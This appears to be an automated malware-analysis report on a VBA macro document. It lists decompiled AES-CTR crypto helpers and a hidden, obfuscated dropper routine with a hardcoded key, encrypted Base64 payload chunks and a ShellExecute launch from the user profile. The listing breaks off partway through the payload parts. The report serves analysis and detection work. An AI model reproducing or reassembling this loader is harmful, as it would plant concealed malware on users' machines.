Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH
Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER
Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty
Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr
Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash
Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: LastError
Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR
m_uChunkedCtx

Line	Instruction	Meta Information
266	Public Function AesChunkedInit(optional key as Variant, optional ByVal KeyLen as Long) as Boolean
267	Dim baEmpty() as Byte
268	Dim baKey() as Byte
270	pvCryptoAesCtrTerminate m_uChunkedCtx	m_uChunkedCtx
271	baEmpty = vbNullString	vbNullString
272	If IsArray(key) Then	IsArray
273	baKey = key
274	Endif
275	If KeyLen <= 0 Then
276	KeyLen = AES_KEYLEN	AES_KEYLEN
277	Endif
278	AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)	m_uChunkedCtx
279	End Function

Function
pvCryptoAesCtrCryptAPIs: 30, Strings: 0, Number of lines: 59, Relevance: 37.559

APIs	Meta Information
pvArraySize
BCryptHashData
pvArrayPtr
AES_BLOCK_SIZE
AES_BLOCK_SIZE
UBound
AES_BLOCK_SIZE
CopyMemory
AES_BLOCK_SIZE
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
Part of subcall function pvInc@Module3: htonl
BCryptEncrypt
BCryptHashData
pvArrayPtr
LastError
Part of subcall function GetSystemMessage@Module3: Space$
Part of subcall function GetSystemMessage@Module3: FormatMessage
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM
Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS
Part of subcall function GetSystemMessage@Module3: Len
Part of subcall function GetSystemMessage@Module3: Mid$
Part of subcall function GetSystemMessage@Module3: vbCrLf
Part of subcall function GetSystemMessage@Module3: Left$
Part of subcall function GetSystemMessage@Module3: Hex

Line	Instruction	Meta Information
395	Private Function pvCryptoAesCtrCrypt(uCtx as UcsCryptoContextType, baData() as Byte, optional ByVal Offset as Long, optional ByVal Size as Long = - 1, optional ByVal HashBefore as Boolean, optional ByVal HashAfter as Boolean) as Boolean
402	Dim lIdx as Long
403	Dim lJdx as Long
404	Dim lPadSize as Long
405	Dim hResult as Long
407	With uCtx
408	If Size < 0 Then
409	Size = pvArraySize(baData) - Offset	pvArraySize
410	Endif
411	If HashBefore Then
412	hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)	BCryptHashData pvArrayPtr
413	If hResult < 0 Then
414	Goto QH
415	Endif
416	Endif
418	For lIdx = Offset To Offset + Size - 1
419	If (. EncrPos And (AES_BLOCK_SIZE - 1)) = 0 Then	AES_BLOCK_SIZE
420	Exit For
421	Endif
422	baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)
423	. EncrPos = . EncrPos + 1
424	Next
425	If lIdx < Offset + Size Then
427	lPadSize = (Offset + Size - lIdx + AES_BLOCK_SIZE - 1) And - AES_BLOCK_SIZE	AES_BLOCK_SIZE
428	If UBound(. EncrData) + 1 < lPadSize Then	UBound
429	ReDim .EncrData(0 To lPadSize - 1) As Byte ' BAD !
430	Endif
432	For lJdx = 0 To lPadSize - 1 Step AES_BLOCK_SIZE	AES_BLOCK_SIZE
433	Call CopyMemory(. EncrData(lJdx), . Nonce(0), AES_BLOCK_SIZE)	CopyMemory AES_BLOCK_SIZE
434	If pvInc(. Nonce(3)) Then
435	If pvInc(. Nonce(2)) Then
436	If pvInc(. Nonce(1)) Then
437	If pvInc(. Nonce(0)) Then
439	Endif
440	Endif
441	Endif
442	Endif
443	Next	AES_BLOCK_SIZE
444	hResult = BCryptEncrypt(. hAesKey, . EncrData(0), lPadSize, 0, 0, 0, . EncrData(0), lPadSize, lJdx, 0)	BCryptEncrypt
445	If hResult < 0 Then
446	Goto QH
447	Endif
449	For . EncrPos = 0 To Offset + Size - lIdx - 1
450	baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)
451	lIdx = lIdx + 1
452	Next
453	Endif
454	If HashAfter Then
455	hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)	BCryptHashData pvArrayPtr
456	If hResult < 0 Then
457	Goto QH
458	Endif
459	Endif
460	End With
462	pvCryptoAesCtrCrypt = True
463	Exit Function
463	QH:
465	uCtx.LastError = GetSystemMessage(hResult)	LastError
466	End Function

Function
AesChunkedCryptArrayAPIs: 21, Strings: 0, Number of lines: 11, Relevance: 26.261

APIs	Meta Information
hAesAlg
LastError
ERR_CHUNKED_NOT_INIT
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory
Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt
Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData
Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr
Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey
Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

Line	Instruction	Meta Information
281	Public Function AesChunkedCryptArray(baInput() as Byte, baOutput() as Byte, optional ByVal Final as Boolean = True) as Boolean
282	If m_uChunkedCtx.hAesAlg = 0 Then	hAesAlg
283	m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT	LastError ERR_CHUNKED_NOT_INIT
284	Exit Function
285	Endif
286	baOutput = baInput
287	AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
288	If Final Then
289	pvCryptoAesCtrTerminate m_uChunkedCtx
290	Endif
291	End Function

Function
ToBase64ArrayAPIs: 10, Strings: 0, Number of lines: 10, Relevance: 12.51

APIs	Meta Information
UBound
String$
UBound
Len
CryptBinaryToString
VarPtr
UBound
CRYPT_STRING_BASE64
StrPtr
Left$

Line	Instruction	Meta Information
514	Public Function ToBase64Array(baData() as Byte) as String
515	Const CRYPT_STRING_BASE64 as Long = 1
516	Dim lSize as Long
518	If UBound(baData) >= 0 Then	UBound
519	ToBase64Array = String$(2 * UBound(baData) + 6, 0)	String$ UBound
520	lSize = Len(ToBase64Array) + 1	Len
521	Call CryptBinaryToString(VarPtr(baData(0)), UBound(baData) + 1, CRYPT_STRING_BASE64, StrPtr(ToBase64Array), lSize)	CryptBinaryToString VarPtr UBound CRYPT_STRING_BASE64 StrPtr
522	ToBase64Array = Left$(ToBase64Array, lSize)	Left$
523	Endif
524	End Function

Function
ToUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

APIs	Meta Information
WideCharToMultiByte
CP_UTF8
StrPtr
Len
WideCharToMultiByte
CP_UTF8
StrPtr
Len
vbNullString

Line	Instruction	Meta Information
542	Public Function ToUtf8Array(sText as String) as Byte()
543	Const CP_UTF8 as Long = 65001
544	Dim baRetVal() as Byte
545	Dim lSize as Long
547	lSize = WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), ByVal 0, 0, 0, 0)	WideCharToMultiByte CP_UTF8 StrPtr Len
548	If lSize > 0 Then
549	Redim baRetVal(0 To lSize - 1)
550	Call WideCharToMultiByte(CP_UTF8, 0, StrPtr(sText), Len(sText), baRetVal(0), lSize, 0, 0)	WideCharToMultiByte CP_UTF8 StrPtr Len
551	Else
552	baRetVal = vbNullString	vbNullString
553	Endif
554	ToUtf8Array = baRetVal
555	End Function

Function
GetSystemMessageAPIs: 9, Strings: 0, Number of lines: 13, Relevance: 11.263

APIs	Meta Information
Space$
FormatMessage
FORMAT_MESSAGE_FROM_SYSTEM
FORMAT_MESSAGE_IGNORE_INSERTS
Len
Mid$
vbCrLf
Left$
Hex

Line	Instruction	Meta Information
568	Public Function GetSystemMessage(ByVal lLastDllError as Long) as String
569	Const FORMAT_MESSAGE_FROM_SYSTEM as Long = &H1000
570	Const FORMAT_MESSAGE_IGNORE_INSERTS as Long = &H200
571	Dim lSize as Long
573	GetSystemMessage = Space$(2000)	Space$
574	lSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM Or FORMAT_MESSAGE_IGNORE_INSERTS, 0, lLastDllError, 0, GetSystemMessage, Len(GetSystemMessage), 0)	FormatMessage FORMAT_MESSAGE_FROM_SYSTEM FORMAT_MESSAGE_IGNORE_INSERTS Len
575	If lSize > 2 Then
576	If Mid$(GetSystemMessage, lSize - 1, 2) = vbCrLf Then	Mid$ vbCrLf
577	lSize = lSize - 2
578	Endif
579	Endif
580	GetSystemMessage = Left$(GetSystemMessage, lSize) & " &H" & Hex(lLastDllError)	Left$ Hex
581	End Function

Function
FromUtf8ArrayAPIs: 9, Strings: 0, Number of lines: 9, Relevance: 11.259

APIs	Meta Information
UBound
String$
UBound
MultiByteToWideChar
CP_UTF8
UBound
StrPtr
Len
Left$

Line	Instruction	Meta Information
557	Public Function FromUtf8Array(baText() as Byte) as String
558	Const CP_UTF8 as Long = 65001
559	Dim lSize as Long
561	If UBound(baText) >= 0 Then	UBound
562	FromUtf8Array = String$(2 * (UBound(baText) + 1), 0)	String$ UBound
563	lSize = MultiByteToWideChar(CP_UTF8, 0, baText(0), UBound(baText) + 1, StrPtr(FromUtf8Array), Len(FromUtf8Array))	MultiByteToWideChar CP_UTF8 UBound StrPtr Len
564	FromUtf8Array = Left$(FromUtf8Array, lSize)	Left$
565	Endif
566	End Function

Function
FromBase64ArrayAPIs: 7, Strings: 0, Number of lines: 14, Relevance: 8.764

APIs	Meta Information
Len
CryptStringToBinary
StrPtr
Len
CRYPT_STRING_BASE64
VarPtr
vbNullString

Line	Instruction	Meta Information
526	Public Function FromBase64Array(sText as String) as Byte()
527	Const CRYPT_STRING_BASE64 as Long = 1
528	Dim lSize as Long
529	Dim baOutput() as Byte
531	lSize = Len(sText) + 1	Len
532	Redim baOutput(0 To lSize - 1)
533	Call CryptStringToBinary(StrPtr(sText), Len(sText), CRYPT_STRING_BASE64, VarPtr(baOutput(0)), lSize, 0, 0)	CryptStringToBinary StrPtr Len CRYPT_STRING_BASE64 VarPtr
534	If lSize > 0 Then
535	Redim Preserve baOutput(0 To lSize - 1)
536	FromBase64Array = baOutput
537	Else
538	FromBase64Array = vbNullString	vbNullString
539	Endif
540	End Function

Property
Get pvArrayPtrAPIs: 7, Strings: 0, Number of lines: 9, Relevance: 8.759

APIs	Meta Information
CopyMemory
ArrPtr
PTR_SIZE
UBound
LBound
VarPtr
LBound

Line	Instruction	Meta Information
489	Private Property Get pvArrayPtr(baArray() as Byte, optional ByVal Index as Long) as LongPtr
490	Dim lPtr as LongPtr
493	Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)	CopyMemory ArrPtr PTR_SIZE
494	If lPtr <> 0 Then
495	If 0 <= Index And Index <= UBound(baArray) - LBound(baArray) Then	UBound LBound
496	pvArrayPtr = VarPtr(baArray(LBound(baArray) + Index))	VarPtr LBound
497	Endif
498	Endif
499	End Property

Subroutine
pvCryptoAesCtrTerminateAPIs: 5, Strings: 0, Number of lines: 24, Relevance: 6.274

APIs	Meta Information
BCryptCloseAlgorithmProvider
BCryptDestroyHash
BCryptCloseAlgorithmProvider
BCryptDestroyKey
BCryptCloseAlgorithmProvider

Line	Instruction	Meta Information
370	Private Sub pvCryptoAesCtrTerminate(uCtx as UcsCryptoContextType)
371	With uCtx
372	If . hPbkdf2Alg <> 0 Then
373	Call BCryptCloseAlgorithmProvider(. hPbkdf2Alg, 0)	BCryptCloseAlgorithmProvider
374	. hPbkdf2Alg = 0
375	Endif
376	If . hHmacHash <> 0 Then
377	Call BCryptDestroyHash(. hHmacHash)	BCryptDestroyHash
378	. hHmacHash = 0
379	Endif
380	If . hHmacAlg <> 0 Then
381	Call BCryptCloseAlgorithmProvider(. hHmacAlg, 0)	BCryptCloseAlgorithmProvider
382	. hHmacAlg = 0
383	Endif
384	If . hAesKey <> 0 Then
385	Call BCryptDestroyKey(. hAesKey)	BCryptDestroyKey
386	. hAesKey = 0
387	Endif
388	If . hAesAlg <> 0 Then
389	Call BCryptCloseAlgorithmProvider(. hAesAlg, 0)	BCryptCloseAlgorithmProvider
390	. hAesAlg = 0
391	Endif
392	End With
393	End Sub

Property
Get pvArraySizeAPIs: 5, Strings: 0, Number of lines: 7, Relevance: 6.257

APIs	Meta Information
CopyMemory
ArrPtr
PTR_SIZE
UBound
LBound

Line	Instruction	Meta Information
501	Private Property Get pvArraySize(baArray() as Byte) as Long
502	Dim lPtr as LongPtr
505	Call CopyMemory(lPtr, ByVal ArrPtr(baArray), PTR_SIZE)	CopyMemory ArrPtr PTR_SIZE
506	If lPtr <> 0 Then
507	pvArraySize = UBound(baArray) + 1 - LBound(baArray)	UBound LBound
508	Endif
509	End Property

Function
pvCryptoGetFinalHashAPIs: 4, Strings: 0, Number of lines: 7, Relevance: 5.007

APIs	Meta Information
HashLen
BCryptFinishHash
hHmacHash
HashLen

Line	Instruction	Meta Information
468	Private Function pvCryptoGetFinalHash(uCtx as UcsCryptoContextType, ByVal lSize as Long) as Byte()
469	Dim baResult() as Byte
471	Redim baResult(0 To uCtx.HashLen - 1)	HashLen
472	Call BCryptFinishHash(uCtx.hHmacHash, baResult(0), uCtx.HashLen, 0)	BCryptFinishHash hHmacHash HashLen
473	Redim Preserve baResult(0 To lSize - 1)
474	pvCryptoGetFinalHash = baResult
475	End Function

Function
pvIncAPIs: 2, Strings: 0, Number of lines: 10, Relevance: 2.51

APIs	Meta Information
htonl
htonl

Line	Instruction	Meta Information
477	Private Function pvInc(lValue as Long) as Boolean
478	lValue = htonl(lValue)	htonl
479	If lValue = - 1 Then
480	lValue = 0
482	pvInc = True
483	Else
484	lValue = (lValue Xor &H80000000) + 1 Xor &H80000000
485	lValue = htonl(lValue)	htonl
486	Endif
487	End Function

Function
AesChunkedGetLastErrorAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
LastError
m_uChunkedCtx

Line	Instruction	Meta Information
293	Public Function AesChunkedGetLastError() as String
294	AesChunkedGetLastError = m_uChunkedCtx.LastError	LastError m_uChunkedCtx
295	End Function

Function
PeekPtrAPIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
CopyMemory
PTR_SIZE

Line	Instruction	Meta Information
583	Private Function PeekPtr(ByVal lPtr as LongPtr) as LongPtr
584	Call CopyMemory(PeekPtr, ByVal lPtr, PTR_SIZE)	CopyMemory PTR_SIZE
585	End Function

Module: ViewSession

Declaration

Line	Content
1	Attribute VB_Name = "ViewSession"
2	Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = False
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Non-Executed Functions

Subroutine
ikwiwiejs_19293_AdeAPIs: 34, Strings: 29, Number of lines: 49, Relevance: 112.049

APIs	Meta Information
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: IsArray
Part of subcall function AesDecryptString@Module3: IsMissing
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: String$
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGIC
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: OPENSSL_MAGICLEN
Part of subcall function AesDecryptString@Module3: KDF_SALTLEN
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: CopyMemory
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: UBound
Part of subcall function AesDecryptString@Module3: PREFIXLEN
Part of subcall function AesDecryptString@Module3: vbNullString
Part of subcall function AesDecryptString@Module3: Raise
Part of subcall function AesDecryptString@Module3: vbObjectError
Environ
Open
Len
Mid
CreateObject
ShellExecute

Strings	Decrypted Strings
"Bnshekao@3123989942"
"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"
"USERPROFILE"
"Shell.Application"
""""
"open"

Line	Instruction	Meta Information
10	Public Sub ikwiwiejs_19293_Ade()
11	Dim key as String
12	Dim decryptedText as String
13	Dim i as Integer
14	Dim parts(1 To 60) as String
15	Dim Oekksoioa_ as String
16	Dim chunkSize as Integer
17	Dim tempFilePath as String
20	key = "Bnshekao@3123989942"
21	part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
22	part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
23	part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
24	part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
25	part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
26	part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
27	part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
28	part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
29	part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
30	part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
31	part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
32	part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
33	part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
34	part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
